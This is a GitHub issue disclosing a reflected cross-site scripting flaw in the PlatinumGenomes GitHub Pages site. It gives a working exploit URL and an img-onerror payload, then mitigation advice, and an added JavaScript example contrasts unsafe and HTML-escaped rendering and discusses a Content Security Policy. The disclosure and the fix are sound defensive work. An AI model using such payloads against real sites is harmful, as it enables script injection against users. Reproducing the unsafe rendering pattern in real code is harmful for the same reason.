Open xElkomy opened 3 years ago
Hello Security Team, today I found a Reflected XSS on your own website.
Steps:-
1- Got this URL:
https://illumina.github.io/PlatinumGenomes/?prefix=
2- Add XSS payload in parameter prefix.
Done. Exploit example:-
https://illumina.github.io/PlatinumGenomes/?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E
Payload:
1'"<Img Src OnError=confirm('xElkomy')>
Fix:-
Delete the reflection of the prefix parameter.
Filter input on arrival.
Encode data on output.
Use appropriate response headers (Content Security Policy).
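The "encode data on output" fix from the report, as an added example that is not part of the issue and not the PlatinumGenomes project's own code. The site is a static GitHub Pages page, so the `prefix` value is read and rendered client-side; the `renderPrefix*` functions below are a hypothetical stand-in for however the real page displays the parameter, and the query string is the one quoted in the report, used here as sample input.

```javascript
// Added example (not from the issue or the PlatinumGenomes project): HTML-encode the
// `prefix` query parameter before it is written into the page, so a reflected value such
// as the payload in the report is shown as inert text instead of being parsed as markup.
// `renderPrefixUnsafe` / `renderPrefixSafe` are hypothetical stand-ins for the site's real
// rendering code.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape the five characters that let attacker-controlled text break out of an HTML
// text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pull `prefix` out of a query string (e.g. window.location.search). URLSearchParams
// percent-decodes it the same way the browser does before the page script sees it.
function getPrefix(search) {
  const value = new URLSearchParams(search).get('prefix');
  return value === null ? '' : value;
}

// Unsafe pattern: the parameter lands in markup unmodified, so a value containing `<`
// starts a new element. This is the bug class the report describes.
function renderPrefixUnsafe(prefix) {
  return `<p>Listing files with prefix: ${prefix}</p>`;
}

// Safe pattern: the same template, with the value HTML-encoded first. In DOM code the
// equivalent is assigning the raw value to `textContent` rather than `innerHTML`.
function renderPrefixSafe(prefix) {
  return `<p>Listing files with prefix: ${escapeHtml(prefix)}</p>`;
}

// Check used below: does a string still contain raw tag delimiters or quotes?
function containsMarkup(text) {
  return /[<>"']/.test(text);
}

// Constructed sample input: the query string quoted in the report.
const reportedSearch =
  '?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E';

if (typeof require !== 'undefined' && require.main === module) {
  const prefix = getPrefix(reportedSearch);
  console.log('decoded prefix :', prefix);
  console.log('unsafe render  :', renderPrefixUnsafe(prefix));
  console.log('safe render    :', renderPrefixSafe(prefix));
  console.log('raw markup left:', containsMarkup(escapeHtml(prefix)));
}
```

The report's last fix item, a Content Security Policy, is worth a note for this hosting setup: GitHub Pages does not let a project set custom HTTP response headers, so the policy would have to be delivered with a `<meta http-equiv="Content-Security-Policy" ...>` tag in the page itself. That is a defence-in-depth layer on top of output encoding, not a replacement for it.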